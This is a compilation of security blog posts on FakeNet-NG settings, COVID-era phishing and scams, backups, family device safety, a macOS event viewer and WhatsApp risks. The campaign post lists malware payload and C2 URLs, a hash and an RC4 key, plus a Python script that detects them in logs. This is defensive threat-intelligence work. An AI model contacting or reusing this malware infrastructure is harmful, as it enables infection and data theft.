In order to keep FakeNet-NG as simple as possible, current default settings for FakeNet-NG do not have the proxy intercept HTTPS traffic on port 443 and create the decrypted stream. To proxy the data you need to set the HTTPListener443 Hidden attribute to True as demonstrated in Figure 19. This tells the proxy to intercept packets and detect the protocol based on packet contents. Please read our blog post on the proxy and protocol detection to learn more about this advanced feature.

Enabled:     True
Port:        443
Protocol:    TCP
Listener:    HTTPListener
UseSSL:      Yes
Webroot:     defaultFiles/
DumpHTTPPosts: Yes
DumpHTTPPostsFilePrefix: http
Hidden:      True

Figure 19: Hide the listener so the traffic will be proxied

We can now examine the packet capture produced by Fakenet-NG. The cleartext can be found in a TCP stream between an ephemeral port on localhost (ProxyListener) and port 80 on localhost (HTTPListener). This is demonstrated in Figure 20.

Figure 20: Cleartext traffic between HTTPListener and Proxy Listener

Conclusion (New Game+)

Fakenet-NG is the de facto standard network simulation tool for malware analysis. It runs without installation and is included in FLARE VM. In addition to its proven and tested default settings, Fakenet offers countless capabilities and configuration options. In this blog post we have presented several tricks to handle common analysis scenarios. To download the latest version, to see a complete list of all configuration options, or to contribute to Fakenet-NG, please see our Github repository.

How to Stay Cyber Safe While Social-Distancing

Do you find yourself working from home these days? Kids off school too? Then your daily life is set to change super-fast. Yes, there is so much to organise to implement this essential ‘social distancing’ strategy. But in the flurry to get everyone set up, it’s essential that we don’t cut corners or make rash decisions, so that neither our headspace nor our online safety is put at risk.

The New Era of Social-Distancing

Many workplaces have already instructed their staff to ‘social distance’ and work from home so we can ‘flatten the curve’, while others are probably not far away from making this decision. Many Australian states have given parents the option to keep their children at home. So, even if you (and the kids) are not yet home, it’s wise to start thinking about how our work (and learn) from home lives might look while we are ‘social-distancing’ and how we can keep our households safe when online. Here are a few things to consider:

  1. Breathe. These are Uncertain Times

It’s completely normal to feel anxious and stressed in this time of great uncertainty. While we are hopeful that ‘social distancing’ measures will help minimise the impact of the virus, the truth is – we just don’t really know what the upcoming months will look like. Acknowledging that you (and all your family members) will be feeling anxious and ‘out of sorts’ at the moment is essential. Cutting family members some slack, particularly if you are all ‘cooped up’ together will definitely make for a smoother self-isolation experience!

  2. Always Think Critically & Don’t Overload on News

When we are feeling panicked and stressed, it’s easy for our rational brains to stop functioning. Social media feeds have been full of ‘miracle cures’ for COVID-19 which have been of great interest to many stressed out peeps. PLEASE avoid clicking links and ‘buying into’ this. Not only could these be links to malicious websites designed to extract your private information, but these themes just feed our anxiety. Instead, seek out advice from reputable medical institutions and authorities. Being a critical thinker online is more important now than ever.

And if the constant barrage of news about the pandemic is affecting your (and your family’s) mood and outlook then take a break from it. Maybe limit yourself to checking for updates once per day as opposed to having constant updates come through on your phone. It’s super easy to disable news notifications: if you are an Apple user, here’s what you need to do and, if you are an Android user, these tips may help.

  3. Ensure You Are Using the Correct Platforms & Software

Before you start downloading programs you think are helpful, check with your workplace or employer about their preferred platforms. It’s highly likely you will have most of the programs they require whether it’s Facetime, Slack, Zoom or Trello. But if you don’t, please ensure you download apps from a reputable source such as the AppStore or Google Play or a site that has been approved by your employer, and check that the developer named on the store listing is the company you expect. Third-party app sites are to be avoided at all costs because, chances are, you’ll score yourself some malicious software!

  4. Protect Yourself & Your Data

Please check whether your employer has security software and a Virtual Private Network (VPN) installed on your devices. If not, or if you are using your ‘home’ devices to undertake company work, then ensuring that both your stored data and the data you share over the internet are protected is essential.

Using a device without security software is a little like leaving your front door open – you are essentially inviting anyone to enter. So, investing in a comprehensive security software solution that protects you from dodgy downloads, fake websites, malicious software and viruses is a no-brainer! A VPN protects the data you send from your devices by creating an encrypted tunnel between your device and the VPN server (your company’s gateway, or your VPN provider’s), so nobody sitting on your local network or at your internet provider can read it along the way. It won’t stop you from downloading something dodgy, though, so think of it as one layer of protection rather than the whole answer.

  5. Back-Up Your Data

Check with your employer to ensure that all your data will be backed up, even when working from home. If they can’t guarantee your work will be backed up then you need to find yourself a reliable, safe option. I am a Dropbox fan but Google Drive is also a great tool. But if you need something a little more robust then check out IDrive or IBackUp.

And don’t forget about the kids! If your offspring are remote schooling, ensure all their hard work is backed up too. Google Drive or Dropbox is a great solution for students.

  6. Manage Your Internet Usage at Home

If your household has two adults working from home plus a tribe of kids remote schooling, then chances are your internet may slow. With more than 90% of Aussies now accessing the internet through the NBN, many are worried that the spike in demand may create havoc.  While the folks from NBN keep assuring us that it’s all going to be fine, we may need to find ourselves staggering our internet use. Why not encourage your kids to do offline activities such as reading or craft while you have some designated time for emails or an online meeting? And don’t forget, you can always create a hotspot from your mobile for another internet source.

  7. Invest in Your Back & Neck – Splash Out on Some Gadgets

Setting up a designated workspace at home is critical to providing some structure in this new phase of your work life. Why not use this as an excuse to get properly setup?

I’ve worked from home for many years but could not have done so without my large monitor and my stand-up desk. Like many peeps, I have a dodgy neck so my stand-up desk and large monitor have meant that I can continue to work with no pain! I simply plug my laptop into my monitor and happy days – everything is enlarged and at eye height! On the days that I decide to work from my kitchen benchtop, my neck always starts to throb – you’d think I’d learn!

And don’t think you need to spend a fortune. A large monitor can cost as little as $200 and a stand-up desk not much more. If you are using these items for work, the chances are you’ll be able to claim these purchases as a tax deduction – why not talk to your accountant?

There is no doubt that 2020 will be ‘the year we will remember for the rest of our lives’. And while the bulk of us aren’t in the high-risk category, it is essential that we all do our bit so that we can protect our most vulnerable. So, please take the time to ensure you are cybersafe while setting up your new work (and school) from home life and even more importantly, keep washing your hands!!

Till Next Time

Stay well

Alex xx

The post How to Stay Cyber Safe While Social-Distancing appeared first on McAfee Blogs.

Don’t Be an April Fool – Protect Your Digital Assets

Be Part of World Back Up Data Day on 31st March

There are not many worse feelings than the realisation that a document you’ve worked tirelessly on has vanished! We’ve all been there and it’s not nice at all. Whether you break into a sweat, scream or even say a word you shouldn’t – losing precious data is downright awful.

With World Backup Day now a fixture on our calendars, there should be no excuses for not protecting your valuable documents and digital files. So, please mark March 31 in your diary people because this is a great reminder to us all about ensuring we have all the right procedures in place to protect our digital assets.

What Does ‘Backing-Up’ Really Mean?

Backing-up means you have a second copy of your key files, which includes documents, photos, videos and even your emails. And this second copy needs to be stored somewhere away from your computer, for example on an external hard drive or online using a cloud storage service.

Some people think that this process happens automatically, however, I’m here to inform you that it doesn’t. Unfortunately, there are no magic back-up fairies. We each need to take charge and set up processes to protect our precious documents.

Why Do We Need To Back-Up?

Take a minute to think about everything you have stored on your digital devices. Of course, there are important documents, emails and likely scans of essential documents but what about your music collection and the pics and videos of your family? Imagine losing these. I know I’d be heartbroken.

While there aren’t any recent studies into the value of our digital assets, in 2014 McAfee undertook research and found that Aussies valued their online assets at a whopping $30,000! So, 6 years later, I’d estimate that figure would be closer to $50,000! Definitely a reason to take action!

But, Doesn’t Everyone Back-Up?

In short, no! According to the people at World Backup Day, 30% of us have never backed up! And when you consider that 113 phones are lost or stolen every minute, that 1 in 10 computers are infected with viruses every month and that 29% of lost data scenarios are caused by accidental human error – it really does make you wonder why!

Let’s Participate in World Back-Up Day!

Data is regarded as one of the most valuable assets in the modern world. It’s basically digital gold! While backing up your personal and sensitive data is something that should be done routinely, World Back-Up Day is a great reminder to us all that we need to get our back-up plan sorted! I know it all sounds tedious, but trust me, it’s less work than the trouble you’d find yourself in after losing important files!

Here are some easy tips to help you ensure you are taking the right steps to safeguard your data this World Backup Day!

  1. A Two-Pronged Approach Is Best

Take the extra step and go both routes for a thorough backup by using an external drive and a cloud service. Losing a document can be the most frustrating thing so it’s always better to be safe than sorry when it comes to your personal data.

  2. Don’t Forget About Your Mobile Device

Back up data from your mobile devices onto a central laptop or personal computer for an added layer of security and protection.

  3. Don’t Rely on Memory Alone!

While routinely backing up your data is one of the most important steps, it can be the first to slip our minds when life gets in the way. Make it super easy to regularly backup by using the existing automatic and scheduled backup features that already come with cloud services and many external drives.

  4. Test It Out!

On top of scheduling regular data backups, make it a habit to routinely check your ability to restore data from backups to ensure they have been performed correctly and haven’t been compromised.

Some of our ‘lowest’ family moments have been a result of family members forgetting to ‘back-up’.  Only months before last year’s HSC, no. 3 son left his laptop on a train. It took me days to recover from the news that he hadn’t been backing up despite my regular reminders!! Yes, we’re all human but if we can minimise the horrendous stress and upset that is caused by ‘lost’ documents and images then that can only be a good thing!

Happy World Back-Up Day everyone!


The post Don’t Be an April Fool – Protect Your Digital Assets appeared first on McAfee Blogs.

Social Engineering Based on Stimulus Bill and COVID-19 Financial Compensation Schemes Expected to Grow in Coming Weeks

Given the community interest and media coverage surrounding the economic stimulus bill currently being considered by the United States House of Representatives, we anticipate attackers will increasingly leverage lures tailored to the new stimulus bill and related recovery efforts such as stimulus checks, unemployment compensation and small business loans. Although campaigns employing themes relevant to these matters are only beginning to be adopted by threat actors, we expect future campaigns—primarily those perpetrated by financially motivated threat actors—to incorporate these themes in proportion to the media’s coverage of these topics.

Threat actors with varying motivations are actively exploiting the current pandemic and public fear of the coronavirus and COVID-19. This is consistent with our expectations; malicious actors are typically quick to adapt their social engineering lures to exploit major flashpoints along with other recurrent events (e.g. holidays, Olympics). Security researchers at FireEye and in the broader community have already begun to identify and report on COVID-19 themed campaigns with grant, payment, or economic recovery themed emails and attachments.

Example Malware Distribution Campaign

On March 18, individuals at corporations across a broad set of industries and geographies received emails with the subject line “COVID-19 Payment” intended to distribute the SILENTNIGHT banking malware (also referred to by others as Zloader). Despite the campaign’s broad distribution, a plurality of associated messages were sent to organizations based in Canada. Interestingly, although the content of these emails was somewhat generic, they were sometimes customized to reference a payment made in the currency of the recipient’s geography and contextually relevant government officials (Figure 1 and Figure 2). These emails were sent from a large pool of different email addresses and carried password-protected Microsoft Word document attachments named “COVID 19 Relief.doc” (Figure 3); password protection keeps mail gateways and sandboxes from inspecting the document unless they are supplied the password. The sending addresses appear to be auto-generated and follow the format <name>.<name><SevenNumberString>. When these documents were opened and macros enabled, they dropped and executed a .JSE script crafted to download and execute an instance of SILENTNIGHT from http://209.141.54[.]161/crypt18.dll.

An analyzed sample of SILENTNIGHT downloaded from this URL had an MD5 hash of 9e616a1757cf1d40689f34d867dd742e, used the RC4 key 'q23Cud3xsNf3', and was associated with the SILENTNIGHT botnet 'PLSPAM'. This botnet has been seen loading configuration files containing primarily U.S. and Canadian financial institution webinject targets. Furthermore, this sample was configured to connect to the following controller infrastructure:

  • http://marchadvertisingnetwork4[.]com/post.php
  • http://marchadvertisingnetwork5[.]com/post.php
  • http://marchadvertisingnetwork6[.]com/post.php
  • http://marchadvertisingnetwork7[.]com/post.php
  • http://marchadvertisingnetwork8[.]com/post.php
  • http://marchadvertisingnetwork9[.]com/post.php
  • http://marchadvertisingnetwork10[.]com/post.php

Figure 1: Example lure using CAD

Figure 2: Example lure using AUD

Figure 3: Malicious Word document

Example Phishing Campaign

Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.

Figure 4: Email lure referencing business grants and loans

Figure 5: SBA-themed message

Figure 6: Office 365 phishing page
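To show how the indicators from the SILENTNIGHT campaign and the SBA-themed Office 365 phishing campaign described above can be put to work, here is an added example (not code from the original FireEye post) that checks mail-gateway and web-proxy records against them. The log format and every sample record are constructed for the example; reading the <name>.<name><SevenNumberString> pattern as the sender address’s local part is an assumption, and that match is treated as low confidence on its own.

```python
"""Added example (not from the original FireEye post): check mail-gateway and
web-proxy records against the indicators published for the SILENTNIGHT
"COVID-19 Payment" campaign and the SBA-themed Office 365 phishing campaign.
The log format and all sample records below are constructed."""
from __future__ import annotations

import re
import shlex
from urllib.parse import urlsplit


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('[.]') back into the form seen in real logs."""
    return ioc.replace("[.]", ".")


# Indicators as published in the post above (refanged where needed).
SILENTNIGHT_MD5 = "9e616a1757cf1d40689f34d867dd742e"
SILENTNIGHT_PAYLOAD = urlsplit(refang("http://209.141.54[.]161/crypt18.dll"))
# marchadvertisingnetwork4[.]com through marchadvertisingnetwork10[.]com
SILENTNIGHT_C2_HOST_RE = re.compile(r"^marchadvertisingnetwork(?:[4-9]|10)\.com$", re.I)
O365_PHISH_HOST = urlsplit(refang("https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/")).hostname
LURE_SUBJECTS = {
    "COVID-19 Payment",
    "Internal Guidance for Businesses Grant and loans in response to respond to COVID-19",
}
LURE_ATTACHMENT = "COVID 19 Relief.doc"
# Assumption: the <name>.<name><SevenNumberString> pattern from the post is the
# sender address's local part. Low confidence alone; useful in combination.
SENDER_RE = re.compile(r"^[a-z]+\.[a-z]+\d{7}@", re.I)


def parse_record(line: str) -> dict[str, str]:
    """Parse a constructed 'kind key=value key="quoted value"' log line."""
    kind, *pairs = shlex.split(line)
    rec = {"kind": kind}
    for pair in pairs:
        key, _, value = pair.partition("=")
        rec[key] = value
    return rec


def check_mail(rec: dict[str, str]) -> list[str]:
    """Return the names of the mail indicators a record matches."""
    hits = []
    if rec.get("subject") in LURE_SUBJECTS:
        hits.append("lure_subject")
    if rec.get("attachment") == LURE_ATTACHMENT:
        hits.append("lure_attachment")
    if SENDER_RE.match(rec.get("from", "")):
        hits.append("sender_pattern")
    if rec.get("md5", "").lower() == SILENTNIGHT_MD5:
        hits.append("silentnight_md5")
    return hits


def check_web(rec: dict[str, str]) -> list[str]:
    """Return the names of the network indicators a record matches."""
    if "url" in rec:
        parts = urlsplit(rec["url"])
        host, path = (parts.hostname or "").lower(), parts.path
    else:
        host, path = rec.get("host", "").lower(), rec.get("path", "")
    hits = []
    if SILENTNIGHT_C2_HOST_RE.match(host):
        hits.append("silentnight_c2")          # beacon to the post.php controllers
    if (host, path) == (SILENTNIGHT_PAYLOAD.hostname, SILENTNIGHT_PAYLOAD.path):
        hits.append("silentnight_payload")     # the .JSE stage fetching crypt18.dll
    if host == O365_PHISH_HOST:
        hits.append("o365_phish")              # any path on the phishing-kit host
    return hits


def scan(lines: list[str]) -> list[tuple[int, str, list[str]]]:
    """Run every record through the matching checker; keep only the hits."""
    findings = []
    for number, line in enumerate(lines, 1):
        if not line.strip():
            continue
        rec = parse_record(line)
        hits = check_mail(rec) if rec["kind"] == "mail" else check_web(rec)
        if hits:
            findings.append((number, rec["kind"], hits))
    return findings


# Constructed sample records: a lure email, a benign email, the payload fetch,
# a C2 beacon, a near miss (network3 is outside the published range), a visit
# to the phishing host, and a sandbox submission carrying the published hash.
SAMPLE_LOG = """\
mail from=jane.doe1234567@example.org subject="COVID-19 Payment" attachment="COVID 19 Relief.doc"
mail from=alice@corp.example subject="Weekly report"
web url=http://209.141.54.161/crypt18.dll
web host=marchadvertisingnetwork7.com path=/post.php method=POST
web host=marchadvertisingnetwork3.com path=/post.php method=POST
web url=https://tyuy56df-kind-giraffe-ok.mybluemix.net/login
mail from=sandbox@corp.example subject="sample submission" md5=9E616A1757CF1D40689F34D867DD742E
""".splitlines()

if __name__ == "__main__":
    for number, kind, hits in scan(SAMPLE_LOG):
        print(f"line {number} ({kind}): {', '.join(hits)}")
```

The C2 hosts are matched as a numbered range rather than seven literal strings so a sibling registered later with the same naming scheme still surfaces for review; the payload is matched on host and path together because the IP alone may host unrelated content, while the phishing kit is matched on host only since the kit can sit at any path on that mybluemix subdomain.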


Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new; they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism, will be especially prepared to meet this challenge.

Scams Facing Consumers in the New Digital WFH Landscape

With many people having their normal day-to-day life turned upside down, scammers are capitalizing on consumers’ newfound lifestyles to make a financial gain or wreak havoc on users’ devices. Let’s take a look at the most recent threats that have emerged as a result of the pandemic.

Fraudulent Relief Checks

On Wednesday March 25, the Senate passed a relief bill that contains a substantial increase in unemployment benefits for Americans who have lost their jobs or have been furloughed due to the economic fallout from the pandemic. Financial scammers are likely to use this as an opportunity to steal money offered to Americans who are facing the negative economic effects of the pandemic, as these crooks could make consumers believe they need to pay money as a condition of receiving government relief. The Federal Trade Commission issued a warning to consumers to be on the lookout for fraudulent activity as the government implements these financial relief packages.

Map Used to Track Pandemic Used to Spread Malware

According to security researcher Brian Krebs, criminals have started disseminating real-time, accurate information about global infection rates to spread malware. In one scheme, an interactive dashboard created by Johns Hopkins University is being used in malicious websites (and possibly in spam emails) to spread password-stealing malware.  Additionally, Krebs flagged a digital pandemic infection kit, which allows other criminals to purchase a bundled version of the map with the scammer’s preferred attack method. 

Texts, WhatsApp, and TikTok Spread Falsehoods

Due to the nature of the rapidly evolving pandemic, criminals are taking advantage of the situation by spreading misinformation. As more communities are being ordered to shelter in place, misleading text messages announcing a national quarantine and claiming to come from the White House buzzed onto cell phones around the U.S. According to the Washington Post, the fraudulent text messages encouraged users to, “Stock up on whatever you guys need to make sure you have a two-week supply of everything. Please forward to your network.” These fake texts spread so widely that the White House’s National Security Council debunked the misleading claims in a Twitter post stating, “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” Communication apps like WhatsApp and social media platforms like TikTok have carried similar examples of this misinformation.

Robocalls Offering Free Test Kits and Low-Cost Health Insurance

On top of fraudulent messages floating around via SMS, WhatsApp, and TikTok, scammers are also using robocalls to spread misinformation around the global pandemic, especially as more users are at home and available to answer phone calls as a result of self-isolation. According to CNN, robocalls from more than 60 different phone numbers are falsely offering low-priced health insurance and free coronavirus test kits. Another type of robocall asks users to sign a petition to ban flights from China. Criminals are taking advantage of the fact that new information around the pandemic is constantly being released, presenting them with an opportunity to scam users by impersonating local and federal officials.

Stay Safe Online With These Tips

During this time of uncertainty, it can be difficult to decipher what is fact from fiction. When it comes to the potential online threats around the recent pandemic, here’s what you can do to stay protected:  

Only trust official news sources

Be sure to only trust reputable news sites. This will help you filter out fake information that is just adding to the noise across the internet.  

Don’t share your personal or financial data

Although financial relief checks are not yet a reality, know that the federal government will not ask you to pay fees or charges upfront to receive these funds. Additionally, the government will not ask you for your Social Security number, bank account, or credit card number.  

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.  

Go directly to the source

If you receive information regarding the pandemic from an unknown user, go directly to the source instead of clicking on links within messages or attachments. For example, users should only trust the map tracking the pandemic’s spread found on the Johns Hopkins website. Using a tool like McAfee WebAdvisor can help users stay safe from similar threats while searching the web.

Register for the FTC’s “Do Not Call” list

The National Do Not Call Registry is run by the FTC. Registering won’t stop scammers, who ignore it, but it does cut down on legitimate telemarketing calls, which makes the unsolicited calls that still get through easier to recognise as suspect.

Stay updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Scams Facing Consumers in the New Digital WFH Landscape appeared first on McAfee Blogs.

Honey, We’re Home! Securing Your Devices and Your Family Bond  


More and more parents and their kids are experiencing what it’s like to work and learn together from home these days. With this increase in device use, it’s more important than ever to verify that all the technology humming under your roof is as secure as possible.

Securing family technology

Run an overall security check. Taking an inventory of all your family’s connected devices and their security should be as important as keeping your doors locked and keeping batteries in your smoke alarms — your family’s safety depends on it. Consider installing a comprehensive security solution across all devices. This will help protect your family against malware, viruses, phishing attacks, and alert you to malicious websites. As part of your security check, be sure to update the software on all devices, including IoT products, TVs, and toys.

Review parental controls. There’s no way around it. Device use will likely skyrocket under your roof for a while. Kids will be online for school, as well as for fun. You may have turned on some filtering on some devices and some social networks, but it may be time to bring on an extra set of eyes and ears with comprehensive filtering software. With increased tech use, parental controls will help monitor your child’s digital activity. Also, with a new work-at-home lifestyle, the software (with time limits) can make scheduling family breaks together much more manageable.

Secure your home router. Your router is akin to your family’s front door, and now is a great time to change the locks (your passwords) on this critical entryway into your home: both the Wi-Fi passphrase and the router’s own admin password, which often still has its factory default. While you’re in the router’s settings, install any pending firmware update and switch off remote administration if you don’t need it. If you are reluctant to change your passwords or think it’s a hassle, consider the simplicity of a password manager. A password manager makes passwords easy to change and easy to keep track of, which can boost overall security. If you are working from home, make sure your home network aligns with your company’s security expectations. For specifics on business security, read this post on working securely from home.

Introduce a VPN (Virtual Private Network). If you’ve toyed with the idea of a VPN but just haven’t made a move, now is a great time. While you may not venture into public spaces much at the present moment, a VPN will add a significant layer of security on your devices if you take a break and go to a public park or if your kids need to go online while at a friend’s. Explain VPN benefits to your kids and how to log on. It’s easy, it’s smart, and it’s secure.

Securing your family bond

Create a schedule that works for everyone. Your home network is likely working on overdrive by now. With the extra online schooling, devices, and video calls taking place, your bandwidth may start to lag. This is because residential internet doesn’t rival business internet. Discuss a schedule for online time and the challenge of accomplishing mutual deadlines each day. Respect and honor one another’s responsibilities. If you’ve never had the chance to talk about the specifics of your job and daily tasks, maybe this is your chance.

Acknowledge the stress of uncertainty. There are feelings — lots of feelings — that accompany change, and everyone’s response to it will vary. Shifting into an abrupt, new routine may feel confusing and confining to a child of any age and cause anxiety and emotions to run high. Talk through these feelings together as often as needed. Acknowledge your child’s losses — connection with teachers, sports, friends, events — and offer empathy and support.

Explore new possibilities — together. No doubt, considerable shifts in a family’s routine can be stressful. Even so, there’s opportunity woven throughout every challenge. With some extra time management, it’s possible to discover some hidden opportunities and adventures along the way. Hiking, canoeing, and exploring the outdoors could become a new love for your family. Watching movie classics together, learning a new skill online, building something, or tackling overdue projects together may open up a new, shared passion. Endless possibilities await.

Balance work, health, and family. Nothing will undermine your efforts to work from home more than a skewed work-life balance or school-life balance (yes, kids can go overboard too)! A recent study shows that remote workers are more productive than office workers and spend more time at their desks. For balance, consider setting firm office/school hours (for both you and the kids), taking exercise breaks throughout the day, and getting an accountability partner to help you stay on track. And, don’t forget — lots of eyes are watching you always — so modeling work-life-and-technology balance for your kids teaches them the same value.

It’s a new frontier, parents, but with the right tools and the proper support around you, anything is possible. Stay healthy, stay happy, and stay secure in this new remote, family adventure.

The post Honey, We’re Home! Securing Your Devices and Your Family Bond   appeared first on McAfee Blogs.

Crescendo: Real Time Event Viewer for macOS

Prior to 2017, researchers couldn’t easily monitor actions performed by a process on macOS and had to resort to coding scripts that produced low level system call data. FireEye released in 2017 that enabled collection of information on macOS at a higher level; at a simplified data set versus something like Dtrace. I created many versions of over the years and have received very positive feedback from users. Recently though, users have noticed it doesn't work on macOS Catalina (10.15)...

Originally, a kernel extension was required to provide the inspection capabilities offered by Unfortunately, kernel extensions are running in privileged mode which has very little protection from software bugs that may lead to system instability. This means kernel extensions should only be used if absolutely necessary. Microsoft and Apple have started providing engineers more userland alternatives to accomplish what previously required writing kernel code.

In Catalina, Apple released the Endpoint Security Framework (ESF) to provide a robust and (more importantly) safer way of getting access to internal operating system artifacts. Being a security guy, I’m not a huge fan of apps that must ship with a kernel extension to get their job done, and I think this is a move in the right direction. With the coming release of 10.15.4, Apple will pop up a warning when a kernel extension is loaded that uses a set of these deprecated kernel programming interfaces (KPIs).

Now seemed like a good time to kick the tires on the Endpoint Security Framework. Also, what engineer doesn’t love to learn new languages, so why not write it all in Swift as well?

Introducing Crescendo

Crescendo is a real time event viewer for macOS that uses the ESF to show process executions and forks, file events, share mounting events, kernel extension loads, and IPC event data. ESF provides a vast amount of data, but the goal was to just pick out the things that analysts would be interested in when analyzing a piece of malware or trying to understand how a process (or component) works. Just the right amount of data without being a firehose of events to the user.

Here are some of the features of Crescendo:

  • System Extension using Endpoint Security Framework
  • Real time event viewer and event detail viewer
  • Search for easy filtering of events by process, PID, username, or event type
  • Filters for unsigned apps vs Apple-signed apps
  • Ability to export all events to JSON
  • Context highlighting when unsigned apps are executed

Apple has added some extra security features that require some extra setup for enabling Crescendo’s system extension. Head on over to the Getting Started section in the README to get started. I'm hopeful this inconvenience will be fixed in future versions.

Oh, One More Thing...

Crescendo is being released open source under the MIT license! It consists of a ready-to-use framework that wraps the ESF with a Swift interface, removing some of the nuances and providing a simple callback for event data. This way other developers don't have to understand all the inner details of the Endpoint Security Framework. One caveat: if you wish to use the framework in your own app, you must obtain the Endpoint Security entitlement (com.apple.developer.endpoint-security.client) from Apple, which is granted on request, and sign your app with it.

Missing a feature you’d like to see? Submit a Pull Request!

Head over to the Crescendo Github to learn more and download the latest release.

Is WhatsApp Safe for Kids? Here’s What Parents Need to Know


We may be talking about the TikTok app in our public circles, but there’s another app — just as widely used — that kids are hoping parents won’t ask too many questions about. That’s because they can use the messaging app WhatsApp to talk privately with friends, exchange content and videos, and (hopefully) fly under the parentals’ radar.

What is WhatsApp?

WhatsApp is a downloadable app that uses your phone’s internet connection (Wi-Fi or mobile data) to send messages, photos, videos, or files. It also allows users to make real-time video calls (much like iOS’ FaceTime). The big perk: because it runs over the internet rather than the phone network, users on Wi-Fi can avoid using up minutes or paying texting fees. If you travel internationally, using WhatsApp is a popular way to avoid expensive international calling charges.

Why do kids love WhatsApp?

It’s easy, it’s fun, it’s free. WhatsApp Messenger lets kids send text messages, videos, photos, and audio messages as well as make video calls to friends without message limits or fees. Oh, and so far, it’s ad free, which is a plus.

It’s a stealth chatting app. WhatsApp is a popular way to create group chats (up to 256 people) that parents won’t necessarily think to check. Often kids will meet someone on one app such as Snapchat or Instagram and move to WhatsApp because they feel it’s less public and less regulated by parents. Like any other app, it can also be hidden behind decoy or vault apps to avoid detection.

You can’t miss the bright green WhatsApp icon on your child’s phone or in the desktop application folder. ©WhatsApp

It has cool features. WhatsApp has a broadcast feature that allows a user to send out a message to a group of people that can then only respond to the sender. The Status Feature enables users to send disappearing photos, videos, and GIFs, much like the fun features on Instagram and Snapchat.

WhatsApp hacks keep it fun. Kids love workarounds and cool functionality hacks they can use to enhance their WhatsApp experience. WhatsApp hacks can be found online with a quick Google search. Hacks help users understand how to do fun things such as schedule messages, create fake conversations, retrieve deleted messages, turn off Read receipts, make a Broadcast List, and formatting hacks that will help their account stand out.

There’s a perception of secrecy/security. WhatsApp has end-to-end encryption built in, which means any texts, photos, or videos exchanged between users are scrambled in transit and can only be read by the people communicating. WhatsApp has set itself apart from other chat apps in this area. No server stores messages after they are delivered, and not even WhatsApp can read, view, or listen to the chats, which gives users a sense of privacy and security. Keep in mind, though, that end-to-end encryption only protects messages on their way between phones: it does nothing for a phone that is lost, unlocked, or infected, or for a chat backup kept in cloud storage unless that backup is encrypted too. And, as we are reminded daily, WhatsApp, like every app, is vulnerable to hacks, scams, and breaches.

What are the risks?

Inappropriate, secretive content. As with any app, the biggest concern is in the way kids and others use the app. WhatsApp (like any messaging app) allows anyone to create an account. Kids can be exposed to inappropriate content and exchange inappropriate content with others. As with any app, kids will also use acronyms or slang to hide risky behavior.

Strangers. A lot of people use WhatsApp, including those with harmful intentions. Users may assume group chats are closed to strangers since members need an invite link (or an admin) to join. However, invite links can be copied by any group member and shared with anyone, who can then click and join without any vetting. An admin can reset the group’s invite link to invalidate the copies already circulating.

Cyberbullying. Group texts are a big reason kids use WhatsApp. Groups can be as large as 256 people. So, if a rumor or mean comment is shared, or a conflict erupts, situations can get intense very quickly and easily spill beyond the WhatsApp environment.

Privacy. While kids believe WhatsApp safely encrypts conversations, encryption does not protect them from people taking and sharing screenshots. Private discussions and photos can also be downloaded. Another threat to privacy is the way the app itself collects data on its users, which can be reviewed in its Privacy Policy and User Data section.

Scams and malware. WhatsApp is not immune to the typical scams that target social apps. The Facebook-owned app has had issues with spyware, catfishing, phishing, money requests, and fraudulent job opportunities — all in a quest to get users to hand over their personal information or assets.

Fake news. Because WhatsApp allows a user to chat in a group of up to 250 people, it’s easy for information to go viral quickly, even if that information isn’t accurate. More recently, fake news originated on WhatsApp that incited panic around Coronavirus conspiracies and the 2018 mob killings in India.

Family Safety Tips

The WhatsApp interface. ©WhatsApp

Download and discuss the app. WhatsApp is easy to download and understand (simple texting interface). Once you know the basics, discuss the pros and cons of WhatsApp with your child. Ask your child to walk you through his or her app to show you how they use it.

Some questions to consider asking might be:

What do you like most about WhatsApp?
What kind of group chats are you a part of?
What kind of media do you mostly receive and send?
Are there any people in your group chats you don’t know?
Are your location and account settings as secure as they can be?
Have you shared personal information or your phone number?
Has any situation made you feel uncomfortable while on the app?

Guide younger users. For younger children or new WhatsApp users (the age requirement is 13), consider creating a private WhatsApp group just for your family. Teach your kids to create a safe profile, maximize safety features, block strangers, report bullying, and safely share pictures, videos, and messages. Use this time to teach them both the upside of the app and the risks.

Monitor devices, screen time, and behavior. There are a lot of issues to consider and pay attention to when your kids use messaging apps. First, to monitor content, consider security software as well as filtering software. Second, pay attention to screen time and your child’s ability to balance technology use. Third, monitor behavior. Messaging apps connect kids to groupthink, a variety of content, and several emotional danger zones. Technology monitoring includes paying particular attention to your child’s emotional and physical health, friend groups, academic performance, and sleep habits.

Talk about privacy settings. Encourage your child to maximize settings and to turn on two-step verification, which sets a PIN that WhatsApp asks for whenever the phone number is registered on a new device; it stops someone who has intercepted a verification code or taken over the number from hijacking the account. The privacy settings for Last Seen, profile photo, About, and Status let users choose Everyone, My Contacts, or Nobody. Review profile information and omit any personal information (age, phone number, other account links, school name, hometown).

Control location sharing. When location sharing is turned on, the images your child shares on WhatsApp will also show his or her exact location when the photo was taken. Be aware of this and consider keeping location turned off.

Avoid strangers and strange links. Once a person outside of your child’s known circle has his or her phone number, they can send any content directly unless (and until) they are blocked. They can catfish, scam, or groom WhatsApp users. Talk with your child about the importance of only chatting with known, trusted people and of blocking messages from strangers. Messages from strangers could contain explicit content, malware, spam, or phishing scams.

